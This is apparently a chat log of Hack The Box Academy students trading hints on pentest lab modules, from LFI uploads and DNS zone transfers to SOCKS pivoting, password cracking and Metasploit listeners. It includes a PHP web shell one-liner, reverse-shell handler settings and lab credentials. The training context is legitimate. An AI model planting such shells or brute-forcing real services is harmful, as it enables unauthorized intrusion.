Also, just because the modules are easy, it's more the implementation that can make a box more difficult.
Saying the modules are easy made me die inside haha
I'm talking in relation to their categories as shown.
ohh
For the most part, if you pay enough attention and take good notes, they can be very easy.
It just comes down to skill issue.
That's good to hear haha. I spent 5 hours today making notes better and getting a better understanding of some modules I completed already.
Yep, I still need to re-up notes from File Transfers on.
So
a fair bit to go
I'm also adding notes for the labs for those
not just the skills assessments
Yes, me also. It takes a lot more time, but it feels worth it.
Trying to do report-style notes for each lab I do
with screenshots and POCs.
Linux shell
LFI and File Uploads
Module = File Inclusion
Section = LFI and File Uploads
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
This works, but why doesn't the next command?
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.txt shell.php
zip warning: missing end signature--probably not a zip file (did you
zip warning: remember to use binary mode when you transferred it?)
zip warning: (if you are trying to read a damaged archive try -F)
You are putting the command in .php, then zipping shell.txt to shell.php.
Nope, zipping shell.php to shell.txt.
The command is different to mv 1 2 | zip 2 1
The final file is shell.txt.
The basic command format is:
zip options archive inpath inpath
Yep, the parent file (the archive) is in first, then the file which is put under.
Are you answering him or me?
Okk
@boreal basalt it is working in my case.
echo '<?php something ?>' > shell.php && zip shell.txt shell.php
Nope
Not working. Type file shell.jpg, then file shell.txt.
shell.txt isn't a zip file
is this your command?
technically it's a zipped php file running the command
Any idea why I get this error?
[-] SMB2_CREATE: /home/ltnbob/Documents/.,65,[Errno 2] No such file or directory: '/home/ltnbob/Documents/.'
Well, it would seem that directory does not exist.
Haha, yea, but I'm unable to create that directory on the HTB Parrot.
This looks like you copied it directly from the section. Change it to your home path instead.
what is the command you ran?
C:\> move same.save \\10.10.15.212\home\htb-ac-534765\Documents
The system cannot find the file specified.
I did try that too actually
How'd you set up the SMB share?
Wrap your command in double quotes.
test
Wrong sharename?
Yeaa
Happens 🤷
Yep, you're right, but why is shell.jpg purple and shell.txt is not?
that's just extension highlighting
And I can't send screenshots wtf.
.jpg shows as purple.
#welcome > non-verified users can't send images.
Thanks
Under the Password Attacks module: "Examine the target and find out the password of the user Will. Then, submit the password as the answer." The hint is ||Sometimes, we will not have any initial credentials available, and as the last step, we will need to bruteforce the credentials to available services to get access. From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose.|| Are we supposed to use a mutated version of the list? I used CME to try and access any SMB shares, which still gave no access after getting the password there. Unable to SSH as ||kira||, but was able to SSH into the machine as ||sam from an earlier module||. Do I need to do further enumeration as ||sam||?
which section is that?
Password attacks > Linux Local Password Attacks > Credential Hunting in Linux
You need to mutate the password list based on the information given to you.
You're thinking on the right path.
Awesome. I grep'd out the parts of the hint into a new list, so here's to hoping I'll get a quick hit.
You don't need to go that far...
They've given you the most important single-word information. That's all you need to start working on.
Hi everyone
How can I submit the number of all "A" records from all zones as the answer??
I'm stuck on the last question about
Information Gathering - Web Edition
Page 7
Active Subdomain Enumeration
Can anyone give me some suggestions?
Well, zone transfer everything you can, then count them.
Quicker if you can make use of grep + wc
There are 22, but the answer is wrong.
Maybe I didn't understand the question that the site asks me, but do you want the number of transfers, like N, or something else?
CAN SOMEONE TELL ME WHAT YOU WANT? I AM NOT REALLY UNDERSTANDING WHAT TO LOOK FOR
WHAT HTB WANTS*
You haven't zone transferred everything.
I don't understand ahah
Pleeeeease heeelp meeee
I wanna understand
Goddammit
What do you mean bro? ahahah
Can only reiterate. Go through everything you found, zone transfer it if possible, then count
kali
For the Attacking Thick Clients module, I cannot get the SQL injection working with the Fatty client.
I've tried everything, even what's exactly shown to work in the module. Am I doing something wrong?
First of all, is the command I gave correct?
dig @10.129.190.227 NS axfr inlanefreight.htb
dig (domain information groper) is a flexible tool for interrogating DNS name servers. It performs DNS lookups and displays the answers that are returned ...
Then you need to dig the other zone you have.
Hi my friend ❤️
So I have to count the zones, not only those given to me by this command, but also those that I obtained from other commands?
Altogether
I mean, does the question ask how many subdomains from a single zone, or does it ask how many subdomains total?
specifics matter
It asks how many A records.
"All 'A' records from ALL zones"
With this command don't I see them all?
In other words, what is the command to see all A records of all zones?
I'm crashing behind this question.
The command you're using gives you all the available information for one zone. The output may reveal new zones, which you can zone transfer once again.
I am using a PowerShell revshell and there is no error output of my commands. Maybe someone can help me upgrade it to see errors for debugging the next steps (Active Directory Enumeration & Attacks,
AD Enumeration & Attacks - Skills Assessment Part I).
What part are you on?
I will DM.
I'm still stuck on how to get on DC01 in the AD Skills Assessment 2 haha.
Busy with the skills assessment on Windows Command Line. Can SSH with the first set of credentials but not with the second pair.
DM me if you want.
Module: Pivoting, tunneling and port forwarding. Section: Dynamic Port Forwarding with SSH and SOCKS Tunneling Q: Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.
Why am I getting that all the hosts are up when I carry out the nmap scan?
This is my scan: proxychains nmap -sn -v 172.16.5.1-200 -T4
Because when you're port forwarding you need to do -sT with nmap.
What module is that?
Introduction to Windows Command Line
That's because the password is literally the flag from the previous question; it's the same format all the way down.
User2 is user1's flag, user3 is user2's flag, user4...
so on and so on
Silly me, thanks!
Performing SYN scans behaves weird because of the way packets are altered during a proxied connection.
Doing a full TCP connect scan allows the full connection to be established, so it provides more accurate results.
Just to add, ICMP doesn't work when proxying (in most cases).
Combining Proxychains with Nmap is a widely used technique to avoid being traced. For example, usually, there is only a proxy between us and the destination when we implement a VPN. Proxychains has 3 configuration options: Dynamic, Strict and Random. How to use Nmap with Proxychains is explained in this article.
Doesn't seem right lol.
They're using the same commands as me.
Can you share the command you used now?
proxychains nmap -sT -v 172.16.5.0/24 -T4
proxychains nmap -sT -Pn -v 172.16.5.0/24 -T4
-Pn marks everything as up.
proxychains nmap -sT -p 3389 172.16.5.0/24 -T4
These are all I did.
They show me 172.16.5.192-256 open.
```
inet 10.129.130.101 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb9:1c4 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:1c4 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:01:c4 txqueuelen 1000 (Ethernet)
RX packets 67135 bytes 4063107 (4.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 66719 bytes 3628971 (3.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.5.129 netmask 255.255.254.0 broadcast 172.16.5.255
inet6 fe80::250:56ff:feb9:caf4 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:ca:f4 txqueuelen 1000 (Ethernet)
RX packets 66 bytes 5747 (5.7 KB)
RX errors 0 dropped 12 overruns 0 frame 0
TX packets 51 bytes 3568 (3.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 582 bytes 45942 (45.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 582 bytes 45942 (45.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```
These are the NICs open.
So I can only try to pivot in 172.16.5.129.
Do this: proxychains nmap -sT --top-ports=20 --open 172.16.5.0/23
If you are on the pivot host, do a ping sweep from there and then use nmap to scan the machines specifically.
Most optimal
ping sweep from the pivot machine is what I did for the module too.
Doesn't nmap also have just the -sn command as a sweep
instead of needing to specify the subnet mask?
Yes, but it doesn't work through proxychains.
-sn sends ICMP requests, so it won't work on pc.
Windows Defender blocks ICMP requests.
Not the reason why ICMP pings don't work here in this case.
By default, pinging is disabled on client Windows machines (not the servers, mostly).
That was what the module said.
We also need to make sure we are aware of the fact that host-alive checks may not work against Windows targets because the Windows Defender firewall blocks ICMP requests (traditional pings) by default.
Am stupid lol
As long as you get it
A full TCP connect scan without ping on an entire network range will take a long time. So, for this module, we will primarily focus on scanning individual hosts, or smaller ranges of hosts we know are alive, which in this case will be a Windows host at 172.16.5.19.
-.-
this is why reading is important
apparently not as important as my ability to type
Hey all, I have a question about which I am stuck:
During an investigation, we discovered a malicious file with an MD5 hash value of 'b40f6b2c167239519fcfb2028ab2524a'. How do we usually call such a hash value in investigations? Answer format: Abbreviation
From which section and module is that?
It's from INCIDENT HANDLING PROCESS.
Read the chapter again
```
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
lport => 8000
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://0.0.0.0:8000
```
This is the same as doing nc -nlvp 8000 -s 0.0.0.0
Right?
Yeah, conceptually, I think.
Yeah, basically.
I never tried combining an HTTPS reverse shell with nc. I'd assume that breaks though. Never actually read what multi/handler does, but it probably does some extra stuff.
nc doesn't handle meterpreter shells.
^
It's one of those: it can handle shells, just not meterpreter.
Conceptually though it's fairly similar.
Also, you shouldn't need to specify -s 0.0.0.0 for nc.
The answer is mentioned several times on the page.
As by default nc -lvnp listens on 0.0.0.0 (all interfaces).
Did you figure this out?
Just do your brute-forcing using subbrute.
^
Also, since you went back that far... I literally answered them on how to do it
just under that post you replied to.
The answer is two things: have inlanefreight.htb in your /etc/hosts file, and only needing inlanefreight.htb in the resolvers.txt for subbrute.
Damn... I just saw a flash.. xD
Someone posted some kind of invite link and got banned in a nanosecond.
That means the bot is working :D
Never saw such a crazy aggressive bot.. great job whoever made it.
Hi, I get the same conclusion. It looks like I can't find any share browsed by SCCM to trigger an SMB NTLM authentication to my target host. I tried to track SCCM user activity (logged on console) without any success. Any hint?
Hi, stuck at the same point, any hint? Unable to find a useful share for that. Any hint?
I have one question about ping sweep.
Aren't the packets that I send doing a ping sweep ICMP as well?
Yes
Windows > Windows internal is not going to be blocked.
Then why, if I do a ping sweep inside the target, is ICMP not blocked?
Because trusted machine architecture :P Windows can inherently trust systems on the same network.
"allow other devices to access this system"
But I'm sending ICMP to other PCs.
Makes sense.
I haven't done the module, but are you doing that file attack where you get the hashes when someone visits the folder where the file you uploaded is?
The URL/SCF File attack
Can I get some help here? I'm on HTB Academy, Linux Fundamentals and Navigation, and this question is showing up: "What is the index number of the "sudoers" file in the "/etc" directory?" But when I type the index number 146948 it says the answer is incorrect.
it's asking for sudoers, not sudoers.d
thank you
Note you can also do ls -li /etc/ to list files and their inodes.
I found it already and got through the question. I'm learning, so it's a bit confusing, appreciate the help, ty.
Nah, you're good.
Just remember, usually when they talk about a file they mean the literal file, not any additional extensions.
Can somebody give me a sanity check on the Passwd, Shadow & Opasswd question in the Password Attacks section? ||I've tried the rockyou.txt, fasttrack.txt, password.list, and mutated password list on the unshadowed file, and none of them work.||
Hello,
I am in the Protected Files section (Password Attacks) and I must decrypt Kira's SSH private key.
I downloaded it on the Pwnbox, and tried
```
┌─[us-academy-1]─[10.10.14.167]─[htb-ac-746322@htb-uyt3pudr5b]─[~]
└──╼ [★]$ ls
Desktop  id_rsa  Templates
┌─[us-academy-1]─[10.10.14.167]─[htb-ac-746322@htb-uyt3pudr5b]─[~]
└──╼ [★]$ ssh2john.py id_rsa > hashkey
Traceback (most recent call last):
  File "/usr/share/john/ssh2john.py", line 193, in <module>
    read_private_key(filename)
  File "/usr/share/john/ssh2john.py", line 103, in read_private_key
    data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
```
Is this normal? What am I doing wrong?
I just tried it and had no issues. Did you try copying and pasting the contents of the id_rsa into a new file on your Pwnbox?
Yes I did with the same result
```
ssh2john.py priv > hashkey
Traceback (most recent call last):
  File "/usr/share/john/ssh2john.py", line 193, in <module>
    read_private_key(filename)
  File "/usr/share/john/ssh2john.py", line 103, in read_private_key
    data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
```
This problem is probably because something went wrong with the copy-pasting, I guess.
Not sure if it would matter either, but did you try calling python as well in the command?
What I thought at first, but the id_rsa file was downloaded, not copy/pasted.
89750ba905425d94c88e19eb59bc785a
That's the MD5 sum I have on my copy of that id_rsa
if you want to compare
โโ[us-academy-1]โ[10.10.14.167]โ[htb-ac-746322@htb-uyt3pudr5b]โ[~]
โโโโผ [โ
]$ python /usr/share/john/ssh2john.py id_rsa > hashkey
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
Oh wait, is it a Python module error? hmmm
md5sum id_rsa
89750ba905425d94c88e19eb59bc785a id_rsa
It's the same
Let me load up pwnbox real fast and see if I have the same issue there
I tried mine on my Kali host.
Which version of Python are you running? Might need to try with python2, as 'decodestring' is deprecated in Python 3.
https://docs.python.org/3.8/library/base64.html#base64.decodestring
You need to install it on your Pwnbox.
ok I see
It's totally removed in Python 3.9 indeed. Same output with python2?
EDIT: ah ok, you just don't have it installed ^^
It's not totally removed, just the syntax changed.
decodestring is totally removed; it was an alias for decodebytes, so the functionality is indeed still there.
From the 3.9 changelog:
"base64.encodestring() and base64.decodestring(), aliases deprecated since Python 3.1, have been removed: use base64.encodebytes() and base64.decodebytes() instead. (Contributed by Victor Stinner in bpo-39351.)"
Anyone available to DM re NoSQLi Skills Assessment II? At a loss.
Can someone give me a nudge on the Attacking Common Services - Easy Lab? I found a username and tried brute forcing all services with the provided PW list, but I am not getting a hit on a password. No clue where to go.
Hi, I'm stuck on "Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file." in Introduction to Windows Command Line. I have tried where /R C:\ waldo.txt, but I get some "A positional parameter cannot be found that accepts argument 'waldo.txt'." type of error.
I just started the CPTS path.
It's going well.
Finally finished InfoSec Foundations
HTB is great
It's a journey.. enjoy the process
For this, regarding SPNs in Kerberoasting -- "I would still write up the finding, but I would drop it down to a medium-risk issue to make the client aware of the risk of SPNs in the domain" -- Is there a way to mitigate Kerberoasting? Like, isn't this always something they could find?
Depends on user access and password policy.
Honestly it's a good question and I'm not sure. I think it's just a part of how AD works.
Lovely!
Once you've verified your main HTB account you can post images.
It's an anti-spam measure.
I've tried; whenever I go to login it tells me my credentials are invalid. Then I reset them and don't get an email. So I reset it manually, and it works on the website but not the Discord extension. Shit just breaks for me.
I'll just figure it out, not worth the stress.
Because app.hackthebox and academy.hackthebox are separate logins
What resource should we use to brute this password?
There's a handy resources button.
Can anyone give me a nudge for the Blind SQL Injection final skills assessment?
I have the user/password combo, but I did not get it using a tool.
I am wondering what tool would be used to brute the user/pass files to get the correct answer.
Is that the smb question?
Crackmap works fine.
But it's a case of needing a valid user first
I will try a newer version .
Otherwise you can get false positives
I was able to narrow down valid accounts using CME. When I added them to a file, then used a password list, I got false negatives.
Using CME with the valid user/pass I still get a negative.
I have the same issue. I was looking for some way to set the currency to GBP, but I think I will contact support.
Hello, I need help with hashcat on Windows.
-local-auth?
Or --local-auth
Hey the --local-auth worked.
Thanks a lot. I assumed the \accountname was local, but it looks different with machinename\accountname for sure.
I think hydra uses single, cme uses double -
Is anyone available to give a hint or clue on how to get the flag in the Bypassing Other Blacklisted Characters in the Command Injections module?
Hello.
I'm working through the Public Exploits page of the Getting Started module.
I'm new to Metasploit and am not sure what to set the TARGETURI to for the exploit I chose.
Google what a URI is
Using the format http://IP:PORT/index.php, is the Target URI asking for the full address or index.php?
In the Active Directory PowerView module, page 7, Enumerating Group Policy Objects (GPOs). The question is "Find the GUID of the Audit Policy GPO." I could not get Get-GPO to run on the Windows box at all. And after trying all kinds of commands I could not find the GUID or figure out how to, at least in PowerShell, at all. I did find it with other methods. I was wondering if anyone has insight into how to do this in PowerShell, since Get-GPO will not run on the box? Thanks!
If it's part of PowerView you may need to first import PowerView. You can see if the required .ps1 modules are in C:\tools.
I did that many times and used PowerView throughout the rest of that module. And yes, it is in C:\tools
From what I can tell it is part of Active Directory and is loaded. But it never works at all. I am wondering A. if something is broken on that box? Or B. if there is another PowerShell method to do this?
It's probably a syntax you're overlooking. I haven't done that module myself
well just Get-GPO should return something, but it errors...
Having trouble with the Attacking Services / Attacking FTP section. The question is asking "which port is FTP running on". I feel so dumb; I've done all kinds of nmap scans including UDP scans, but nothing shows FTP. Should I use the AttackBox instead of the VPN?
Did you run nmap with -p-?
I did.
Are you sure you're not overlooking it? What was the nmap output?
Nope. Ports came out as 22, 53, 139, 445. Just to do a sanity check I actually inserted those 4 ports as my answer for the question, and all 4 of those were incorrect.